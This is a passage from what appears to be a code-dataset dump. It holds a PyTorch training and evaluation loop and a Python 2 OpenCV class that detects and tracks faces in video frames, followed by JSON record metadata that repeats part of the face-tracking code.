trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, 
label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-5": "\r\nfrom utils import *\r\nimport copy\r\nimport torch.nn as nn\r\n\r\nCUDA = torch.cuda.is_available()\r\n\r\n\r\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\r\n net.train()\r\n tl = Averager()\r\n pred_train = []\r\n act_train = []\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n tl.add(loss)\r\n pred_train.extend(pred.data.tolist())\r\n act_train.extend(y_batch.data.tolist())\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n return tl.item(), pred_train, act_train\r\n\r\n\r\ndef predict(data_loader, net, loss_fn):\r\n net.eval()\r\n pred_val = []\r\n act_val = []\r\n vl = Averager()\r\n with torch.no_grad():\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n vl.add(loss.item())\r\n pred_val.extend(pred.data.tolist())\r\n act_val.extend(y_batch.data.tolist())\r\n return vl.item(), pred_val, act_val\r\n\r\n\r\ndef set_up(args):\r\n set_gpu(args.gpu)\r\n ensure_path(args.save_path)\r\n torch.manual_seed(args.random_seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\r\n seed_all(args.random_seed)\r\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\r\n set_up(args)\r\n\r\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\r\n\r\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\r\n\r\n model = get_model(args)\r\n para = get_trainable_parameter_num(model)\r\n print('Model {} size:{}'.format(args.model, para))\r\n\r\n if CUDA:\r\n model = model.cuda()\r\n\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\r\n loss_fn = 
nn.CrossEntropyLoss()\r\n\r\n def save_model(name):\r\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\r\n if os.path.exists(previous_model):\r\n os.remove(previous_model)\r\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))\r\n\r\n trlog = {}\r\n trlog['args'] = vars(args)\r\n trlog['train_loss'] = []\r\n trlog['val_loss'] = []\r\n trlog['train_acc'] = []\r\n trlog['val_acc'] = []\r\n trlog['max_acc'] = 0.0\r\n\r\n timer = Timer()\r\n\r\n for epoch in range(1, args.max_epoch + 1):\r\n\r\n loss_train, pred_train, act_train = train_one_epoch(\r\n data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\r\n\r\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)\r\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'\r\n .format(epoch, loss_train, acc_train, f1_train))\r\n\r\n loss_val, pred_val, act_val = predict(\r\n data_loader=val_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\r\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.\r\n format(epoch, loss_val, acc_val, f1_val))\r\n\r\n\r\n if acc_val > trlog['max_acc']:\r\n trlog['max_acc'] = acc_val\r\n save_model('max-acc')\r\n\r\n if args.save_model:\r\n # save model here for reproduce\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n torch.save(model.state_dict(), model_name_reproduce)\r\n\r\n trlog['train_loss'].append(loss_train)\r\n trlog['train_acc'].append(acc_train)\r\n trlog['val_loss'].append(loss_val)\r\n trlog['val_acc'].append(acc_val)\r\n\r\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),\r\n subject, fold))\r\n save_name_ = 
'trlog' + save_name\r\n ensure_path(osp.join(args.save_path, 'log_train'))\r\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\r\n\r\n return trlog['max_acc']\r\n\r\n\r\ndef test(args, data, label, reproduce, subject, fold):\r\n seed_all(args.random_seed)\r\n set_up(args)\r\n\r\n test_loader = get_dataloader(data, label, args.batch_size, False)\r\n\r\n model = get_model(args)\r\n if CUDA:\r\n model = model.cuda()\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n if reproduce:\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n model.load_state_dict(torch.load(model_name_reproduce))\r\n else:\r\n model.load_state_dict(torch.load(args.load_path))\r\n loss, pred, act = predict(\r\n data_loader=test_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\r\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\r\n return acc, pred, act\r\n\r\n\r\n",
"step-ids": [
2,
4,
6,
7,
8
]
}
|
[
2,
4,
6,
7,
8
] |
import math
import datetime as dt
import cv2
import os
from face import Face
class Video:
def __init__(self, vidSource, variableList=[], showWindow=True):
self.vidcap = cv2.VideoCapture(vidSource)
self.cascade = cv2.CascadeClassifier("face_cascade2.xml")
self.visibleFaceList = [] # contains all Face objects within the frame
self.notVisibleFaceList = []
self.inactiveFaceList = []
self.totalFaceCount = 0 # number of total faces seen so far
self.frameCount = 0 # counter to determine when to detect
self.cleanThresh = 0
# PERHAPS SUBCLASS?
self.frameImage = None # this is whatever kind of image returned by openCV
self.showWindow = showWindow
if self.showWindow:
cv2.namedWindow("show")
#####TWEAKABLE VARIABLES#####
if variableList == []:
# Always between 0 and 1
self.velocityWeight = 0
self.scoreWeight = 1
self.minRemovalScore = 0.1
# Maybe larger than one
self.radiusSize = 0.5
# Probably always larger than one
self.timeOut = 15
self.frameGap = 0
self.cleanThresh = 5
self.usingTime = True
# add a catch statement for if variable list isn't of length 6
else:
# Always between 0 and 1
self.velocityWeight = variableList[0]
self.scoreWeight = variableList[1]
self.minRemovalScore = variableList[2]
# Maybe larger than one
self.radiusSize = variableList[3]
# Probably always larger than one
self.timeOut = variableList[4]
self.frameGap = variableList[5]
self.cleanThresh = variableList[6]
self.usingTime = variableList[7]
def getFaces(self):
return self.visibleFaceList
def getCurrentFrame(self):
return self.frameImage
def pruneFaceList(self):
# for i in range(len(self.notVisibleFaceList)):
i = 0
while i < len(self.notVisibleFaceList):
pos = self.notVisibleFaceList[i].getPosition()
timeSinceDetection = dt.datetime.now()-pos[2]
if timeSinceDetection.total_seconds() > self.timeOut:
print timeSinceDetection.total_seconds()
print self.notVisibleFaceList[i].id
self.inactiveFaceList.append(self.notVisibleFaceList.pop(i))
i += 1
def addNewFace(self, location):
fc = Face()
fc.id = self.totalFaceCount
self.totalFaceCount += 1
fc.setPosition(location)
self.visibleFaceList.append(fc)
def listHelper(self, listChoice, rects):
megaList = []
for i in range(len(rects)):
tempList = []
for j in range(len(listChoice)):
tempList.append(self.scoreForBeingHere(listChoice[j],rects[i]))
# if there are issues, it's with copying
megaList.append(list(tempList))
return megaList
def dualListHelper(self, list1, list2, rects):
megaList = []
breakPoint = 0
for i in range(len(list1)):
tempList = []
for j in range(len(rects)):
tempList.append(self.scoreForBeingHere(list1[i],rects[j]))
breakPoint = i
megaList.append(list(tempList))
for i in range(len(list2)):
tempList = []
for j in range(len(rects)):
tempList.append(self.scoreForBeingHere(list2[i],rects[j]))
# if there are issues, it's with copying
megaList.append(list(tempList))
return megaList, breakPoint
def analyzeFrame(self, rects):
self.pruneFaceList()
#Case 1
# if len(rects)>len(self.visibleFaceList):
# print "case1"
if len(self.visibleFaceList)>0:
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = [-1]*(len(self.visibleFaceList)+len(self.notVisibleFaceList))
totalAssigned=0
visibleFaces = len(self.visibleFaceList)
totalFaces = len(self.visibleFaceList)+len(self.notVisibleFaceList)
indices = []
while totalAssigned < len(rects):
# print "WHILE"
# print len(rects)
index = 0
highest = 0
highFaceIndex = 0
for i in range(len(megaList)):
if assignmentList[i] == -1:
currentVal = max(megaList[i])
# print currentVal
currentIndex = megaList[i].index(currentVal)
# print currentIndex not in assignmentList
if currentVal > highest and currentIndex not in assignmentList and currentVal > self.minRemovalScore:
highest = currentVal
index = currentIndex
highFaceIndex = i
if highest != 0:
if highFaceIndex > breakPoint:
face = self.notVisibleFaceList.pop(highFaceIndex-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList[highFaceIndex] = currentIndex
indices.append(highFaceIndex)
totalAssigned +=1
else:
print "HIGHEST = 0"
for j in range(len(rects)):
# print rects
if j not in assignmentList:
# print "here"
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(j)
indices.append(len(assignmentList)-1)
totalAssigned += 1
# print assignmentList
self.makeAssignments(assignmentList,rects, indices, visibleFaces)
for i in range(visibleFaces-1):
if assignmentList[i] == -1:
face = self.visibleFaceList.pop(i)
self.notVisibleFaceList.append(face)
else:
for i in range(len(rects)):
self.addNewFace(rects[i])
def analyzeFrame2(self, rects):
self.pruneFaceList()
#Case 1
if len(rects)>len(self.visibleFaceList):
# print "case1"
if len(self.visibleFaceList)>0:
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
if highest > self.minRemovalScore:
if i > breakPoint:
face = self.notVisibleFaceList.pop(i-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList.append(index)
else:
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(len(self.visibleFaceList)-1)
self.makeAssignments(assignmentList, rects)
k = 0
while k < breakPoint:
if k not in assignmentList:
face = self.visibleFaceList.pop(k)
self.notVisibleFaceList.append(face)
k+=1
else:
for i in range(len(rects)):
self.addNewFace(rects[i])
#Case 2
elif len(rects)==len(self.visibleFaceList):
# print "case2"
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = []
# print "list"
# print megaList
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
if highest > self.minRemovalScore:
# print "problem case?"
if i > breakPoint:
face = self.notVisibleFaceList.pop(i-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList.append(index)
else:
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(len(self.visibleFaceList)-1)
self.makeAssignments(assignmentList, rects)
k = 0
while k < breakPoint:
if k not in assignmentList:
face = self.visibleFaceList.pop(k)
self.notVisibleFaceList.append(face)
k+=1
#Case 3 (less rects than faces)
else:
# print "case3"
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = []
probabilityList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
probabilityList.append(highest)
if highest > self.minRemovalScore:
if i > breakPoint:
face = self.notVisibleFaceList.pop(i-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList.append(index)
else:
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(len(self.visibleFaceList)-1)
self.makeAssignments(assignmentList, rects)
k = 0
while k < breakPoint:
if k not in assignmentList:
face = self.visibleFaceList.pop(k)
self.notVisibleFaceList.append(face)
k+=1
l = 0
# while len(assignmentList) > len(rects):
def analyzeFrame3(self,rects):
self.pruneFaceList()
if len(rects)>len(self.visibleFaceList):
if len(self.visibleFaceList)>0:
megaList = self.listHelper(self.visibleFaceList,rects)
# print megaList
assignmentList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
assignmentList.append(index)
self.makeAssignments(assignmentList, rects)
notList = self.listHelper(self.notVisibleFaceList,rects)
if notList != []:
for i in range(len(rects)):
index = -1
highest = 0
for j in range(len(self.notVisibleFaceList)):
if j not in assignmentList:
# print notList
if notList[i][j] > highest:
index = j
highest = notList[j][i]
if index != -1:
if notList[index][i] > self.minRemovalScore:
face = self.notVisibleFaceList.pop(index)
face.setPosition(rects[i])
self.visibleFaceList.append(face)
else:
fc = Face()
fc.id = self.totalFaceCount
# print fc.id
self.totalFaceCount += 1
fc.setPosition(rects[i])
self.visibleFaceList.append(fc)
else:
for i in range(len(rects)):
fc = Face()
fc.id = self.totalFaceCount
# print fc.id
self.totalFaceCount += 1
fc.setPosition(rects[i])
self.visibleFaceList.append(fc)
else:
for i in range(len(rects)):
fc = Face()
fc.id = self.totalFaceCount
# print fc.id
self.totalFaceCount += 1
fc.setPosition(rects[i])
self.visibleFaceList.append(fc)
elif len(rects)==len(self.visibleFaceList):
megaList = self.listHelper(self.visibleFaceList,rects)
# print megaList
assignmentList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
assignmentList.append(index)
self.makeAssignments(assignmentList, rects)
else:
# less rects than faces
megaList = self.listHelper(self.visibleFaceList,rects)
# print megaList
assignmentList = []
probabilityList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
assignmentList.append(index)
probabilityList.append(highest)
if len(probabilityList)!=0:
lowIndex = probabilityList.index(min(probabilityList))
self.notVisibleFaceList.append(self.visibleFaceList.pop(lowIndex))
assignmentList.pop(lowIndex)
self.makeAssignments(assignmentList, rects)
def makeAssignments(self, assignmentList, rects, indices, visibleFaces):
# print "assign"
# print assignmentList
# print rects
counter = 0
# print len(self.visibleFaceList)
for i in range(len(assignmentList)):
if rects != []:
if assignmentList[i] != -1:
if i < visibleFaces:
self.visibleFaceList[i].setPosition(rects[assignmentList[i]])
else:
print "HERE"
print assignmentList
print rects
print assignmentList[indices[counter]]
print rects[assignmentList[indices[counter]]]
self.visibleFaceList[counter+visibleFaces].setPosition(rects[assignmentList[indices[counter]]])
counter += 1
def scoreForBeingHere(self, face1, rect):
"""compares face and rect to sees what the chances are that they are the same
returns float between 0 and 1"""
time = dt.datetime.now()
recentPosition = face1.getPosition()
if not (recentPosition==[]):
deltaTime = (time - recentPosition[2]).total_seconds()
velocity = face1.getVelocity()
area = math.pow(face1.getArea(),0.5)
if self.usingTime:
radius = deltaTime*area*self.radiusSize
else:
radius = area*self.radiusSize
middleOfRect = ((rect[2]+rect[0])/2,(rect[3]+rect[1])/2)
middleOfFace = ((recentPosition[1][0]+recentPosition[0][0])/2,(recentPosition[1][1]+recentPosition[0][1])/2)
if velocity != 0:
middleOfFace = (middleOfFace[0] + velocity[0]/velocity[2]*deltaTime*self.velocityWeight, middleOfFace[1] + velocity[1]/velocity[2]*deltaTime*self.velocityWeight)
diffMiddles = math.pow(math.pow(middleOfFace[0]-middleOfRect[0], 2) + math.pow(middleOfFace[1]-middleOfRect[1], 2), 0.5)
# asymptote equation such that after the difference in middles is more than 1 radius away,
# prob will be down to 0.25 but after that it slowly goes to 0 never quite reaching it
x = math.pow(diffMiddles/radius,3)
# decays with increase in time
if self.usingTime:
score = self.scoreWeight/(deltaTime*(3*x+1))
else:
score = self.scoreWeight/((3*x+1))
return score
else:
return 0
def readFrame(self):
"""read frame from openCV info"""
success, self.frameImage = self.vidcap.read()
return success, self.frameImage
def detectAll(self):
"""Run face detection algorithm on the whole picture and make adjustments
to the faces based on where the are and where they should be"""
rects = self.cascade.detectMultiScale(self.frameImage, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))
return rects
# # won't really ever use
# def estimateAll(self):
# """Step forward one frame, update all (visible?) faces based on estimation
# from velocities; don't run face detection algorithm
# Should be run every frame except where detectAll() is run."""
# pass
# # for face in self.visibleFaceList[]:
# # face.estimateNextPosition()
def findFaces(self):
"""detects all faces with the frame then analyzes the frame to determine
which face belongs to which face object"""
rects = self.detectAll()
if len(rects)==0:
rects = []
else:
rects[:, 2:] += rects[:, :2]
self.analyzeFrame(rects)
def display(self):
""" Displays current frame with rectangles and boxes"""
# print len(self.visibleFaceList)
# print "not visible: "
# for face in self.notVisibleFaceList:
# print face.id
# print "visibel: "
for i in range(len(self.visibleFaceList)):
# print self.visibleFaceList[i].id
self.showRectangle(self.visibleFaceList[i].getPosition(),self.visibleFaceList[i].id)
cv2.imshow("show", self.frameImage)
def clean(self):
i = 0
while i < len(self.notVisibleFaceList):
if len(self.notVisibleFaceList[i].prevPositions) < self.cleanThresh:
self.notVisibleFaceList.pop(i)
self.totalFaceCount -= 1
i += 1
def showRectangle(self, pos, IDnum):
cv2.rectangle(self.frameImage, pos[0], pos[1], (255,0,0), 2)
cv2.putText(self.frameImage, str(IDnum), pos[0], cv2.FONT_HERSHEY_SIMPLEX, 2, [0,255,0], 3)
	def endWindow(self):
		"""Release the video source (webcam or file) and destroy the "show" window."""
		self.vidcap.release()
		cv2.destroyWindow("show")
|
normal
|
{
"blob_id": "7af0566161c909457d40d3856434f1fb1e800aab",
"index": 1445,
"step-1": "import math\nimport datetime as dt\nimport cv2\nimport os\nfrom face import Face\n\nclass Video:\n\tdef __init__(self, vidSource, variableList=[], showWindow=True):\n\t\tself.vidcap = cv2.VideoCapture(vidSource)\n\t\tself.cascade = cv2.CascadeClassifier(\"face_cascade2.xml\")\n\t\tself.visibleFaceList = []\t\t# contains all Face objects within the frame\n\t\tself.notVisibleFaceList = []\n\t\tself.inactiveFaceList = []\n\t\tself.totalFaceCount = 0\t\t # number of total faces seen so far\n\t\tself.frameCount = 0\t\t\t # counter to determine when to detect\n\t\tself.cleanThresh = 0\n\t\t# PERHAPS SUBCLASS?\n\t\tself.frameImage = None # this is whatever kind of image returned by openCV\n\t\tself.showWindow = showWindow\n\n\t\tif self.showWindow:\n\t\t\tcv2.namedWindow(\"show\")\n\t\t#####TWEAKABLE VARIABLES#####\n\t\tif variableList == []:\n\t\t\t# Always between 0 and 1\n\t\t\tself.velocityWeight = 0\n\t\t\tself.scoreWeight = 1\n\t\t\tself.minRemovalScore = 0.1\n\t\t\t# Maybe larger than one\n\t\t\tself.radiusSize = 0.5\n\t\t\t# Probably always larger than one\n\t\t\tself.timeOut = 15\n\t\t\tself.frameGap = 0\n\t\t\tself.cleanThresh = 5\n\t\t\tself.usingTime = True\n\t\t# add a catch statement for if variable list isn't of length 6\n\t\telse:\n\t\t\t# Always between 0 and 1\n\t\t\tself.velocityWeight = variableList[0]\n\t\t\tself.scoreWeight = variableList[1]\n\t\t\tself.minRemovalScore = variableList[2]\n\t\t\t# Maybe larger than one\n\t\t\tself.radiusSize = variableList[3]\n\t\t\t# Probably always larger than one\n\t\t\tself.timeOut = variableList[4]\n\t\t\tself.frameGap = variableList[5]\n\t\t\tself.cleanThresh = variableList[6]\n\t\t\tself.usingTime = variableList[7]\n\n\n\tdef getFaces(self):\n\t\treturn self.visibleFaceList\n\n\tdef getCurrentFrame(self):\n\t\treturn self.frameImage\n\n\tdef pruneFaceList(self):\n\t\t# for i in range(len(self.notVisibleFaceList)):\n\t\ti = 0\n\t\twhile i < len(self.notVisibleFaceList):\n\t\t\tpos = 
self.notVisibleFaceList[i].getPosition()\n\t\t\ttimeSinceDetection = dt.datetime.now()-pos[2]\n\t\t\tif timeSinceDetection.total_seconds() > self.timeOut:\n\t\t\t\tprint timeSinceDetection.total_seconds()\n\t\t\t\tprint self.notVisibleFaceList[i].id\n\t\t\t\tself.inactiveFaceList.append(self.notVisibleFaceList.pop(i))\n\t\t\ti += 1\n\n\tdef addNewFace(self, location):\n\t\tfc = Face()\n\t\tfc.id = self.totalFaceCount\n\t\tself.totalFaceCount += 1\n\t\tfc.setPosition(location)\n\t\tself.visibleFaceList.append(fc)\n\n\tdef listHelper(self, listChoice, rects):\n\t\tmegaList = []\n\t\tfor i in range(len(rects)):\n\t\t\ttempList = []\n\t\t\tfor j in range(len(listChoice)):\n\t\t\t\ttempList.append(self.scoreForBeingHere(listChoice[j],rects[i]))\n\t\t\t# if there are issues, it's with copying\n\t\t\tmegaList.append(list(tempList))\n\t\treturn megaList\n\n\tdef dualListHelper(self, list1, list2, rects):\n\t\tmegaList = []\n\t\tbreakPoint = 0\n\t\tfor i in range(len(list1)):\n\t\t\ttempList = []\n\t\t\tfor j in range(len(rects)):\n\t\t\t\ttempList.append(self.scoreForBeingHere(list1[i],rects[j]))\n\t\t\tbreakPoint = i\n\t\t\tmegaList.append(list(tempList))\n\t\tfor i in range(len(list2)):\n\t\t\ttempList = []\n\t\t\tfor j in range(len(rects)):\n\t\t\t\ttempList.append(self.scoreForBeingHere(list2[i],rects[j]))\n\t\t\t# if there are issues, it's with copying\n\t\t\tmegaList.append(list(tempList))\n\n\t\treturn megaList, breakPoint\n\n\tdef analyzeFrame(self, rects):\n\t\tself.pruneFaceList()\n\t\t#Case 1\n\t\t# if len(rects)>len(self.visibleFaceList):\n\t\t\t# print \"case1\"\n\t\tif len(self.visibleFaceList)>0:\n\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\tassignmentList = [-1]*(len(self.visibleFaceList)+len(self.notVisibleFaceList))\n\t\t\ttotalAssigned=0\n\t\t\tvisibleFaces = len(self.visibleFaceList)\n\t\t\ttotalFaces = len(self.visibleFaceList)+len(self.notVisibleFaceList)\n\t\t\tindices = 
[]\n\n\t\t\twhile totalAssigned < len(rects):\n\t\t\t\t# print \"WHILE\"\n\t\t\t\t# print len(rects)\n\t\t\t\tindex = 0\n\t\t\t\thighest = 0\n\t\t\t\thighFaceIndex = 0\n\t\t\t\tfor i in range(len(megaList)):\n\t\t\t\t\tif assignmentList[i] == -1:\n\t\t\t\t\t\tcurrentVal = max(megaList[i])\n\t\t\t\t\t\t# print currentVal\n\t\t\t\t\t\tcurrentIndex = megaList[i].index(currentVal)\n\t\t\t\t\t\t# print currentIndex not in assignmentList\n\t\t\t\t\t\tif currentVal > highest and currentIndex not in assignmentList and currentVal > self.minRemovalScore:\n\t\t\t\t\t\t\thighest = currentVal\n\t\t\t\t\t\t\tindex = currentIndex\n\t\t\t\t\t\t\thighFaceIndex = i\n\t\t\t\tif highest != 0:\n\t\t\t\t\tif highFaceIndex > breakPoint:\n\n\t\t\t\t\t\tface = self.notVisibleFaceList.pop(highFaceIndex-breakPoint-1)\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\tassignmentList[highFaceIndex] = currentIndex\n\t\t\t\t\tindices.append(highFaceIndex)\n\t\t\t\t\ttotalAssigned +=1\n\t\t\t\telse:\n\t\t\t\t\tprint \"HIGHEST = 0\"\n\t\t\t\t\tfor j in range(len(rects)):\n\t\t\t\t\t\t# print rects\n\t\t\t\t\t\tif j not in assignmentList:\n\t\t\t\t\t\t\t# print \"here\"\n\t\t\t\t\t\t\tface = Face()\n\t\t\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\t\tassignmentList.append(j)\n\t\t\t\t\t\t\tindices.append(len(assignmentList)-1)\n\t\t\t\t\t\t\ttotalAssigned += 1\n\t\t\t# print assignmentList\n\t\t\tself.makeAssignments(assignmentList,rects, indices, visibleFaces)\n\t\t\tfor i in range(visibleFaces-1):\n\t\t\t\tif assignmentList[i] == -1:\n\t\t\t\t\tface = self.visibleFaceList.pop(i)\n\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\telse:\n\t\t\tfor i in range(len(rects)):\n\t\t\t\tself.addNewFace(rects[i])\n\n\tdef analyzeFrame2(self, rects):\n\t\tself.pruneFaceList()\n\t\t#Case 1\n\t\tif len(rects)>len(self.visibleFaceList):\n\t\t\t# print 
\"case1\"\n\t\t\tif len(self.visibleFaceList)>0:\n\t\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\t\tassignmentList = []\n\t\t\t\tfor i in range(len(megaList)):\n\t\t\t\t\thighest = 0\n\t\t\t\t\tindex = 0\n\t\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\t\tindex = j\n\t\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\t\tif highest > self.minRemovalScore:\n\t\t\t\t\t\tif i > breakPoint:\n\t\t\t\t\t\t\tface = self.notVisibleFaceList.pop(i-breakPoint-1)\n\t\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\t\tassignmentList.append(index)\n\t\t\t\t\telse:\n\t\t\t\t\t\tface = Face()\n\t\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tassignmentList.append(len(self.visibleFaceList)-1)\n\n\t\t\t\tself.makeAssignments(assignmentList, rects)\n\t\t\t\tk = 0\n\t\t\t\twhile k < breakPoint:\n\t\t\t\t\tif k not in assignmentList:\n\t\t\t\t\t\tface = self.visibleFaceList.pop(k)\n\t\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\t\t\t\tk+=1\n\n\t\t\telse:\n\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\tself.addNewFace(rects[i])\n\n\t\t#Case 2\n\t\telif len(rects)==len(self.visibleFaceList):\n\t\t\t# print \"case2\"\n\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\tassignmentList = []\n\t\t\t# print \"list\"\n\t\t\t# print megaList\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tif highest > 
self.minRemovalScore:\n\t\t\t\t\t# print \"problem case?\"\n\t\t\t\t\tif i > breakPoint:\n\t\t\t\t\t\tface = self.notVisibleFaceList.pop(i-breakPoint-1)\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\tassignmentList.append(index)\n\t\t\t\telse:\n\t\t\t\t\tface = Face()\n\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\tassignmentList.append(len(self.visibleFaceList)-1)\n\n\t\t\tself.makeAssignments(assignmentList, rects)\n\t\t\tk = 0\n\t\t\twhile k < breakPoint:\n\t\t\t\tif k not in assignmentList:\n\t\t\t\t\tface = self.visibleFaceList.pop(k)\n\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\t\t\tk+=1\n\n\t\t#Case 3 (less rects than faces)\n\t\telse:\n\t\t\t# print \"case3\"\n\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\tassignmentList = []\n\t\t\tprobabilityList = []\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t# ensure that face hasn't been used 